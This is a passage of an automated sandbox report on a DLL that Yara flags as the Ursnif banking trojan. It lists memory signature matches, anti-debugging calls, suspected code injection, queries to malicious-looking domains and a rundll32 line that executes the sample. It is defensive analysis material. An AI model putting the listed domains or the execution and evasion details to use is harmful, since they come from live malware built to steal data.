                      Source: Yara matchFile source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4668, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4712, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.810000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 00000013.00000002.500670226.0000000004D40000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW8
                      Source: loaddll32.exe, 00000000.00000002.768580069.00000000010C7000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.500798053.0000000004D65000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.503450551.00000000053B0000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.518255520.0000000005005000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 00000014.00000002.503739309.000000000548E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWH
                      Source: rundll32.exe, 00000003.00000003.700067622.0000000000889000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW,
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E506CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E51C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E528861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E56DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E56DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E56DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E51C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E528861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E56DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E56DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E56DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E51C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E528861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E56DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E56E3B4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E56DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E506CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E506CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E506CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E4FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.219.162 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.223.66 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.124.210 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.137.114 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.773341401.0000000001630000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.457889197.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776035012.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.470562084.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.460801376.00000000039C0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: loaddll32.exe, 00000000.00000002.773341401.0000000001630000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.457889197.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776035012.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.470562084.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.460801376.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.773341401.0000000001630000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.457889197.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776035012.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.470562084.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.460801376.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.773341401.0000000001630000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.457889197.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776035012.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.470562084.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.460801376.00000000039C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E51FF15 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4668, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4712, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.810000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, type: MEMORY
